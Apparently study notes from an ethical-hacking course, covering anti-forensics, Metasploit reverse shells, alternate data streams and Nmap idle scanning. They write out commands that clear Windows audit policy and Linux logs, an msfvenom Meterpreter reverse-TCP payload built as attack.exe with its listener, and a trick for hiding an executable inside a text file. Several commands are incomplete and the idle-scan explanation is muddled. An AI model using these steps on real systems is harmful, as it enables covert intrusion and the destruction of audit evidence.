—Windows Auditing

To disable all auditing on a windows machine we can use the CLI add auditpol.exe

auditpol.exe /clear

We can also delete logs on linux

Rm /var/log/messages

Metasploit can also clear logs remotely

—msfvenom and sessions

Because many clients are behind a firewall, we need the client to initiate the session outbound to us

By creating a payload exe file we can create a session to gain access to a computer.

Step 1.

Make sure Metasploit is connected to the Postgres database


Service postgresql start

msf > msfdb init

  1. Create the attack filemsfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1234 —format=exe > attack.exe
  2. Set metasploit to listen on port 1234Use exploit/multi/handlerSet LHOST LPORT 1234Set payload windows/meterpreter/reverse_tcpRun –
  3. Once executed on the client machine we can connect to the session

—ADFS Streams

we can hide data in other data so that when an file is opened then an exe

can run.

Step1. Appending the exe to the txt file

type calc.exe > C:\folder\textfile.txt:calc.exe

Step2. Creating an alias

mklink calc.exe  C:/folder/textfile.txt:calc.exe

–Grey Hat Hacker

reformed black hat hacker

-Hack Value

An item considered of high value to attack and exploit


This is a website where you enter a URL and get OS type, services like php

A list of ip addresses,

–Pentesting Senerios

Black Box = No Information is given about the system like ip hostname etc

Grey Box = Partial information is given like IP and Hostname

White Box = All Technical details are provided about the appliance or server

—Download a website

httrack will download a website to your local computer

—Web Data Extractor

Poll a website for sensitive information get things like phone numbers

Email addresses and even passwords

—Email Tracker Pro

Analyse headers in email headers to track down location and SMTP relay


Poll a website for sensitive information get usernames doc files and more


Usernames are stored in the following directory


The password is encrypted into a hash in a shadow file


The groups are stored in the following directory


Security permissions

Read write execute (Rwx)User (RWX)Group (RWX) Everyone

Chmod -R 750 FOLDER

—Idle Scan

Lets say you want to scan a list of open ports on a host but you don’t want NMAP to scan because you

Want to hide your private IP and avoid IDS/IPS. The Idle scan works like this in series

  • A spoofed ACK from a client to a web server
  • Syn-ack gets sent back from the web server to the client
  • Send a syn-ack is sent to the client from your attacking machine taking note of the TCP SEQ Number
  • A RST is sent back from the client to the attacking machine. If the TCP SEQ is 1 higher

    Then no webserver is present on that address. If the REST is +2 higher than the syn-ack

    We know that the webserver is listening and sent back a syn-ack

NMAP Command to check all open ports on a host idle scanning

Nmap -Pn -sI -p50-200

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